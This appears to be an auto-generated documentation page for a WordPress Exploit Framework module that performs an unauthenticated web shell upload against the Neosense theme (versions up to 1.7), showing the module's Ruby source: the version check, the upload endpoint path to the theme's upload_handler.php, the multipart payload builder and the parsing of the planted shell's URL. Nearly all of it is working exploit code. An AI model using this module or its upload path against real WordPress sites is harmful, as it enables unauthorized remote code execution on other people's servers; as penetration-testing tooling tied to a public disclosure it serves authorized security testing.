class Wpxf::Exploit::NeosenseShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/neosense_shell_upload.rb, line 6 def initialize super update_info( name: 'Neosense Theme <= 1.7 Unauthenticated Shell Upload', author: [ 'Walter Hop', # Discovery and disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8622'], ['URL', 'https://lifeforms.nl/20160919/unrestricted-upload-neosense'] ], date: 'Sep 19 2016' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/shell/neosense_shell_upload.rb, line 23 def check check_theme_version_from_style('neosense', '1.8') end
payload_body_builder()
click to toggle source
# File lib/wpxf/modules/exploit/shell/neosense_shell_upload.rb, line 31 def payload_body_builder builder = Utility::BodyBuilder.new builder.add_file_from_string('qqfile', payload.encoded, payload_name) builder end
uploaded_payload_location()
click to toggle source
# File lib/wpxf/modules/exploit/shell/neosense_shell_upload.rb, line 37 def uploaded_payload_location result = JSON.parse(upload_result.body) result['url'] end
uploader_url()
click to toggle source
# File lib/wpxf/modules/exploit/shell/neosense_shell_upload.rb, line 27 def uploader_url normalize_uri(wordpress_url_themes, 'neosense', 'js', 'back-end', 'libraries', 'fileuploader', 'upload_handler.php') end